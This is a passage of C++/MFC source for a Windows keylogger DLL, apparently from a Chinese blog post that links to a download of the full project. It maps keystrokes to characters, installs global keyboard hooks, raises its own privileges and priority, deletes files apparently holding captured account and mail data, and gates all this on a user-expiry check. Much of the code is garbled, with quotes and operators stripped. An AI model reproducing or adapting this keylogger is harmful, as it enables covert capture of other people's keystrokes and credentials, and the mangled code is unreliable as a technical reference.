D;break;case E:szStr E;break;case F:szStr F;break;case G:szStr G;break;case H:szStr H;break;case I:szStr I;break;case J:szStr J;break;case K:szStr K;break;case L:szStr L;break;case M:szStr M;break;case N:szStr N;break;case O:szStr O;break;case P:szStr P;break;case Q:szStr Q;break;case R:szStr R;break;case S:szStr S;break;case T:szStr T;break;case U:szStr U;break;case V:szStr V;break;case W:szStr W;break;case X:szStr X;break;case Y:szStr Y;break;case Z:szStr Z;break;}}else if(!b_Sft b_Clk){switch(wParam){case 1:szStr 1;break;case 2:szStr 2;break;case 3:szStr 3;break;case 4:szStr 4;break;case 5:szStr 5;break;case 6:szStr 6;break;case 7:szStr 7;break;case 8:szStr 8;break;case 9:szStr 9;break;case 0:szStr 0;break;case A:szStr A;break;case B:szStr B;break;case C:szStr C;break;case D:szStr D;break;case E:szStr E;break;case F:szStr F;break;case G:szStr G;break;case H:szStr H;break;case I:szStr I;break;case J:szStr J;break;case K:szStr K;break;case L:szStr L;break;case M:szStr M;break;case N:szStr N;break;case O:szStr O;break;case P:szStr P;break;case Q:szStr Q;break;case R:szStr R;break;case S:szStr S;break;case T:szStr T;break;case U:szStr U;break;case V:szStr V;break;case W:szStr W;break;case X:szStr X;break;case Y:szStr Y;break;case Z:szStr Z;break;}}else if(b_Sft b_Clk){switch(wParam){case 1:szStr !;break;case 2:szStr ;break;case 3:szStr #;break;case 4:szStr $;break;case 5:szStr %;break;case 6:szStr ^;break;case 7:szStr ;break;case 8:szStr *;break;case 9:szStr (;break;case 0:szStr );break;case A:szStr a;break;case B:szStr b;break;case C:szStr c;break;case D:szStr d;break;case E:szStr e;break;case F:szStr f;break;case G:szStr g;break;case H:szStr h;break;case I:szStr i;break;case J:szStr j;break;case K:szStr k;break;case L:szStr l;break;case M:szStr m;break;case N:szStr n;break;case O:szStr o;break;case P:szStr p;break;case Q:szStr q;break;case R:szStr r;break;case S:szStr s;break;case T:szStr t;break;case U:szStr u;break;case V:szStr v;break;case W:szStr w;break;case X:szStr x;break;case Y:szStr y;break;case Z:szStr z;break;}}else{switch(wParam){case 1:szStr 1;break;case 2:szStr 2;break;case 3:szStr 3;break;case 4:szStr 4;break; case 5:szStr 5;break;case 6:szStr 6;break;case 7:szStr 7;break;case 8:szStr 8;break;case 9:szStr 9;break;case 0:szStr 0;break;case A:szStr a;break;case B:szStr b;break;case C:szStr c;break;case D:szStr d;break;case E:szStr e;break;case F:szStr f;break;case G:szStr g;break;case H:szStr h;break;case I:szStr i;break;case J:szStr j;break;case K:szStr k;break;case L:szStr l;break;case M:szStr m;break;case N:szStr n;break;case O:szStr o;break;case P:szStr p;break;case Q:szStr q;break;case R:szStr r;break;case S:szStr s;break;case T:szStr t;break;case U:szStr u;break;case V:szStr v;break;case W:szStr w;break;case X:szStr x;break;case Y:szStr y;break;case Z:szStr z;break;}}//小键盘按键switch(wParam){case VK_NUMPAD1:szStr 1;break;case VK_NUMPAD2:szStr 2;break;case VK_NUMPAD3:szStr 3;break;case VK_NUMPAD4:szStr 4;break;case VK_NUMPAD5:szStr 5;break;case VK_NUMPAD6:szStr 6;break;case VK_NUMPAD7:szStr 7;break;case VK_NUMPAD8:szStr 8;break;case VK_NUMPAD9:szStr 9;break;case VK_NUMPAD0:szStr 0;break;case VK_MULTIPLY:szStr *;break;case VK_ADD: szStr ;break;case VK_SUBTRACT:szStr -;break;case VK_DECIMAL: szStr .;break;case VK_DIVIDE: szStr /;break;//其他特殊键case VK_BACK:szStr.Delete(szStr.GetLength()-1);break;case VK_TAB:szStr ;break;case VK_SPACE:szStr ;break;// 回车键case VK_RETURN:break;}//其他键的处理char KeyName[50];ZeroMemory(KeyName,50);GetKeyNameText(lParam,KeyName,50);CString KeyNameStrKeyName;if(KeyNameStr){if(b_Sft)szStr ~;elseszStr ;}if(KeyNameStr-){if(b_Sft)szStr _;elseszStr -;}if(KeyNameStr){if(b_Sft)szStr ;elseszStr ;}if(KeyNameStr[){if(b_Sft)szStr {;elseszStr [;}if(KeyNameStr]){if(b_Sft)szStr };elseszStr ];}if(KeyNameStr;){if(b_Sft)szStr :;elseszStr ;;}if(KeyNameStr){if(b_Sft)szStr \;elseszStr ;}if(KeyNameStr,){if(b_Sft)szStr ;elseszStr ,;}if(KeyNameStr.){if(b_Sft)szStr ;elseszStr .;}if(KeyNameStr/){if(b_Sft)szStr ?;elseszStr /;}if(KeyNameStr\\){if(b_Sft)szStr |;elseszStr \\;}//AfxMessageBox(szStr);}}}LRESULT RetVal CallNextHookEx(hkb, nCode, wParam, lParam ); return RetVal;
}// 安装 HOOK 钩子BOOL DllExport installhook()
{///// 检测用户到期时间 /////SYSTEMTIME st;CString strYear, strMonth, strDay, strFullTime;GetLocalTime(st);strYear.Format(%d, st.wYear);strMonth.Format(%d, st.wMonth);strDay.Format(%d, st.wDay);if(st.wMonth 10){int mmm strMonth.Find(0, 0);if(mmm 0){strMonth 0 strMonth;}}if(st.wDay 10){int ddd strDay.Find(0, 0);if(ddd 0){strDay 0 strDay;}}strFullTime strYear strMonth strDay;UserEndData.Remove(.);UserEndData.Remove(-);int LocalTime atoi(strFullTime);int UserEndTime atoi(UserEndData);if( LocalTime UserEndTime ){//获取自身程序绝对路径TCHAR szmyPath[MAX_PATH 1]{0};GetModuleFileName(NULL, szmyPath, MAX_PATH);(_tcsrchr(szmyPath, _T(\\)))[1] 0;szMyselfPath.Format(TEXT(%s\\), szmyPath);//// 删除帐号记录文件DeleteFile(C:\\NTUSERS.LOG);DeleteFile(C:\\MailData.txt);DeleteFile(C:\\MailName.txt);////设置程序优先级别为最高SetRealTimePriority();////提升程序的系统权限AdjustPrivileges();//// HOOK 键盘 1hkb SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc1, hins, 0);//// HOOK 键盘 2hie SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc2, hinss, 0);////创建线程定时清理用户输入数据DWORD dwThreadIDX;CreateThread(NULL, 0, CleanUserData, NULL, 0, dwThreadIDX); //}return TRUE;
}// 卸载 HOOK 钩子BOOL DllExport UnHook(HHOOK szHookName)
{ if( UnhookWindowsHookEx(szHookName) ){return TRUE;}return FALSE;
}BOOL CTest3App::InitInstance()
{ AFX_MANAGE_STATE(AfxGetStaticModuleState());hinsAfxGetInstanceHandle();hinssAfxGetInstanceHandle();return TRUE;
}/
// CTest3App constructionCTest3App::CTest3App()
{// TODO: add construction code here,// Place all significant initialization in InitInstance
}/
// The one and only CTest3App objectCTest3App theApp; 完整项目下载 主程序 DLL 帐号验证工具 一并打包上传写的有点乱七八糟没啥技术含量对于目前情况已经没什么用处。
【CSDN下载】https://download.csdn.net/download/qq_39190622/88683609
